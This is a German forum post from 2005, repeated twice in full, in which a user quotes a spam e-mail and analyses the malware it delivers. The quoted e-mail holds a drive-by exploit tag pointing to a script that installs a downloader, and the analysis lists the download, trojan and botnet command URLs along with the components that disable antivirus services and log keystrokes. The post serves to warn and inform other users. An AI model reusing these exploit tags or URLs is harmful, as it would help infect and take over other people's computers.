Sirius
11.03.2005, 09:47
Hallo.
Das ist gestern reingekommen.
----
Date: Thu, 10 Mar 2005 xx:xx:xx +0000
Return-path: <gtqcna [at] yahoo.com>
Received: from [81.182.0.207] by web13337.mail.yahoo.com via HTTP; Thu, 10
Mar 2005 xx:xx:xx -0600
From: Serena Salinas <gtqcna [at] yahoo.com>
To: ###@###
cc:
Message-ID: [ID filtered]
In-Reply-To:
References:
Subject: Free young girls pics
X-Priority: 3
X-CHAOS-Read: yes
X-CHAOS-Size: 2393
Content-Type: multipart/alternative; boundary=
"0-8439802256-4554162116=:67051"
Content-Transfer-Encoding: binary
--0-8439802256-4554162116=:67051
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
<object data="http://www.nzawgjtm. info/sol/page.php"></object>
[...]
Wednesday is my regular day off and having slept in I had just showered and was getting ready to head to the golf course when Val rang. We hadn`t talked much since the other Saturday night, I was still a bit ticked off at her not telling me the whole deal. It seemed Tracey had called her and asked if I could come to her office ASAP. Val asked me to dress in my navy blue suite and be ready for her to arrive. The BMW stopped outside and I climbed into the passenger seat and headed off to the city.<br>http://R51l7Ir7Vr1YeD8.cjb.net/ (<a href=)">Cl1ck h3re to read more</a>
---
ACHTUNG: Der erste Link ist so heiß, dass ich ihn entschärfen musste. Er kommt einmal als Exploit <object... und dann als normaler Link vor (von mir entfernt).
Das Ziel ist "kugelsicher" in China gehostet. Dahinter verbirgt sich ein VB-Script (page.hta), das mittels des Internet Explorers einen sog. "W32/Downloader" (ut.exe) auf dem PC installiert: http://www.nzawgjtm. info/sol/ut.exe
Ich habe die Datei mal heruntergeladen, zerlegt und analysiert:
Die ut.exe ist per UPX gepackt und zerlegt sich selbst in vier teilweise mit UPX gepackte Dateien.
1. Eine davon kümmert sich intensiv um Firewall und Antivirenprogramme. Per DeleteService()-Systemaufruf wird versucht eine lange Liste bekannter Dienste abzuschalten.
2. Eine andere zeichnet möglicherweise Tastatureingaben auf, die weitergeleitet werden.
3. Eine weitere möchte zuerst einen Trojaner laden: http://www.domain-name.biz/downloads/doublespy.exe und nimmt dann Verbindung mit einem Bot-Netz? auf: http://www.porksiop.info/pHy5D89r/command.php?IP=%s&Port1=%u&ID=%s (http://www.porksiop.info/pHy5D89r/command.php)
Vom Bot-Netz aus kann die Kontrolle über den PC übernommen werden, um ihn z.B. als Spam-Relay oder für DDoS-Angriffe zu nutzen.
Den Trojaner gibt es allerdings nicht (in Frankreich gehostet), aber das Bot-Netz ist erreichbar:
http://www.porksiop.info ist in Moskau registriert - unter demselben Namen wie der heiße Link: Elena Dmitrievna. Kennt jemand die Dame?
65.75.189.182 ist in Griechenland gehostet. Die whois-Daten geben nicht viel her, aber es sollte doch innerhalb der EU möglich sein, die Kiste trocken zu legen.
Der CJB-Link ist vermutlich nur zur Ablenkung - die Adresse ist noch zu haben.
Grüße
BTW: So feines Futter bekommt mein Linux nicht alle Tage http://img.homepagemodules.de/smile2.gif
Das ist gestern reingekommen.
----
Date: Thu, 10 Mar 2005 xx:xx:xx +0000
Return-path: <gtqcna [at] yahoo.com>
Received: from [81.182.0.207] by web13337.mail.yahoo.com via HTTP; Thu, 10
Mar 2005 xx:xx:xx -0600
From: Serena Salinas <gtqcna [at] yahoo.com>
To: ###@###
cc:
Message-ID: [ID filtered]
In-Reply-To:
References:
Subject: Free young girls pics
X-Priority: 3
X-CHAOS-Read: yes
X-CHAOS-Size: 2393
Content-Type: multipart/alternative; boundary=
"0-8439802256-4554162116=:67051"
Content-Transfer-Encoding: binary
--0-8439802256-4554162116=:67051
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
<object data="http://www.nzawgjtm. info/sol/page.php"></object>
[...]
Wednesday is my regular day off and having slept in I had just showered and was getting ready to head to the golf course when Val rang. We hadn`t talked much since the other Saturday night, I was still a bit ticked off at her not telling me the whole deal. It seemed Tracey had called her and asked if I could come to her office ASAP. Val asked me to dress in my navy blue suite and be ready for her to arrive. The BMW stopped outside and I climbed into the passenger seat and headed off to the city.<br>http://R51l7Ir7Vr1YeD8.cjb.net/ (<a href=)">Cl1ck h3re to read more</a>
---
ACHTUNG: Der erste Link ist so heiß, dass ich ihn entschärfen musste. Er kommt einmal als Exploit <object... und dann als normaler Link vor (von mir entfernt).
Das Ziel ist "kugelsicher" in China gehostet. Dahinter verbirgt sich ein VB-Script (page.hta), das mittels des Internet Explorers einen sog. "W32/Downloader" (ut.exe) auf dem PC installiert: http://www.nzawgjtm. info/sol/ut.exe
Ich habe die Datei mal heruntergeladen, zerlegt und analysiert:
Die ut.exe ist per UPX gepackt und zerlegt sich selbst in vier teilweise mit UPX gepackte Dateien.
1. Eine davon kümmert sich intensiv um Firewall und Antivirenprogramme. Per DeleteService()-Systemaufruf wird versucht eine lange Liste bekannter Dienste abzuschalten.
2. Eine andere zeichnet möglicherweise Tastatureingaben auf, die weitergeleitet werden.
3. Eine weitere möchte zuerst einen Trojaner laden: http://www.domain-name.biz/downloads/doublespy.exe und nimmt dann Verbindung mit einem Bot-Netz? auf: http://www.porksiop.info/pHy5D89r/command.php?IP=%s&Port1=%u&ID=%s (http://www.porksiop.info/pHy5D89r/command.php)
Vom Bot-Netz aus kann die Kontrolle über den PC übernommen werden, um ihn z.B. als Spam-Relay oder für DDoS-Angriffe zu nutzen.
Den Trojaner gibt es allerdings nicht (in Frankreich gehostet), aber das Bot-Netz ist erreichbar:
http://www.porksiop.info ist in Moskau registriert - unter demselben Namen wie der heiße Link: Elena Dmitrievna. Kennt jemand die Dame?
65.75.189.182 ist in Griechenland gehostet. Die whois-Daten geben nicht viel her, aber es sollte doch innerhalb der EU möglich sein, die Kiste trocken zu legen.
Der CJB-Link ist vermutlich nur zur Ablenkung - die Adresse ist noch zu haben.
Grüße
BTW: So feines Futter bekommt mein Linux nicht alle Tage http://img.homepagemodules.de/smile2.gif